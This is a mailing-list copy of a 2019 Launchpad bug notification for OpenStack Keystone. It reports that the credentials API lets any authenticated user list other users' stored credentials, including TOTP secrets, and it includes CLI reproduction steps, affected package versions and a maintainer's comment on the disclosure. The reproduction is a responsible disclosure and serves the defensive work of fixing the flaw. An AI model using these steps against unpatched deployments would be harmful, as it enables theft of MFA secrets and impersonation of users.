[Bug 1855080] Re: Credentials API allows listing and retrieving of all user's credentials
Jeremy Stanley
fungi at yuggoth.org
Thu Dec 5 17:57:21 UTC 2019
Daniel, is there any organization you want credited along with you for
reporting this defect?
Gage, I think the use of "user's" in the title (copied from the report
itself) incorrectly suggests that a user only has access to credentials
for their own user rather than, as the description explains, for all
users in that project. Instead maybe try "Credentials API allows listing
and retrieving of project credentials" or something like that? As for
the affects line, assuming this problem was only introduced in Stein,
you want "==15.0.0, ==16.0.0" (wow, were there really no stable/stein
point releases?!?) or alternatively ">=15.0.0 <15.0.1, >=16.0.0 <16.0.1"
to accurately reflect that any point releases will contain the fix.
--
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to keystone in Ubuntu.
https://bugs.launchpad.net/bugs/1855080
Title:
Credentials API allows listing and retrieving of all user's
credentials
Status in OpenStack Identity (keystone):
In Progress
Status in OpenStack Security Advisory:
Confirmed
Status in keystone package in Ubuntu:
New
Bug description:
Tested against Stein and Train.
# User creating a credential, i.e totp or similar
$ OS_CLOUD=1 openstack token issue
| project_id | c3caf1b55bb84b78a795fd81838e5160
| user_id | 9971b0f13d2d4a578212d028a53c3209
$ OS_CLOUD=1 openstack credential create --type test 9971b0f13d2d4a578212d028a53c3209 test-data
$ OS_CLOUD=1 openstack credential list
+----------------------------------+------+----------------------------------+-----------+------------+
| ID | Type | User ID | Data | Project ID |
+----------------------------------+------+----------------------------------+-----------+------------+
| 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None |
+----------------------------------+------+----------------------------------+-----------+------------+
# Different User but same Project
$ OS_CLOUD=2 openstack token issue
| project_id | c3caf1b55bb84b78a795fd81838e5160
| user_id | 6b28a0b073fc4ac7843f33190ebc5c3c
$ OS_CLOUD=2 openstack credential list
+----------------------------------+------+----------------------------------+-----------+------------+
| ID | Type | User ID | Data | Project ID |
+----------------------------------+------+----------------------------------+-----------+------------+
| 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None |
+----------------------------------+------+----------------------------------+-----------+------------+
# Different User and Different Project
$ OS_CLOUD=3 openstack token issue
| project_id | d43f20ae5a7e4f36b701710277384401
| user_id | 2e48f1a7d1474391a826a2b9700e5949
$ OS_CLOUD=3 openstack credential list
+----------------------------------+------+----------------------------------+-----------+------------+
| ID | Type | User ID | Data | Project ID |
+----------------------------------+------+----------------------------------+-----------+------------+
| 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None |
+----------------------------------+------+----------------------------------+-----------+------------+
As shown anyone who's authenticated can retrieve any credentials
including their 'secret'.
This is a rather severe information disclosure vulnerability and
completely defies the purpose of TOTP or MFA as these credentials are
not kept secure or private whatsoever.
If Auth-rules are configured allow login with only 'topt' it would be
extremely easy to assume a different user's identity.
A CVE should be issued for this. I can take care of that paperwork.
Versions affected and tested:
Train/ubuntu:
$ dpkg -l | grep keystone
ii keystone 2:16.0.0-0ubuntu1~cloud0 all OpenStack identity service - Daemons
ii keystone-common 2:16.0.0-0ubuntu1~cloud0 all OpenStack identity service - Common files
ii python-keystoneauth1 3.13.1-0ubuntu1~cloud0 all authentication library for OpenStack Identity - Python 2.7
ii python-keystoneclient 1:3.19.0-0ubuntu1~cloud0 all client library for the OpenStack Keystone API - Python 2.x
ii python-keystonemiddleware 6.0.0-0ubuntu1~cloud0 all Middleware for OpenStack Identity (Keystone) - Python 2.x
ii python3-keystone 2:16.0.0-0ubuntu1~cloud0 all OpenStack identity service - Python 3 library
ii python3-keystoneauth1 3.17.1-0ubuntu1~cloud0 all authentication library for OpenStack Identity - Python 3.x
ii python3-keystoneclient 1:3.21.0-0ubuntu1~cloud0 all client library for the OpenStack Keystone API - Python 3.x
ii python3-keystonemiddleware 7.0.1-0ubuntu1~cloud0 all Middleware for OpenStack Identity (Keystone) - Python 3.x
Stein/RHEL:
$ rpm -qa | grep keystone
python3-keystoneclient-3.19.0-0.20190312070330.6c4bb8b.el8ost.noarch
openstack-keystone-15.0.1-0.20190720060412.5f27c4b.el8ost.noarch
python3-keystoneauth1-3.13.1-0.20190311052414.bde07bc.el8ost.noarch
python3-keystonemiddleware-6.0.0-0.20190312071144.fca37ea.el8ost.noarch
python3-keystone-15.0.1-0.20190720060412.5f27c4b.el8ost.noarch
To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1855080/+subscriptions
More information about the Ubuntu-openstack-bugs
mailing list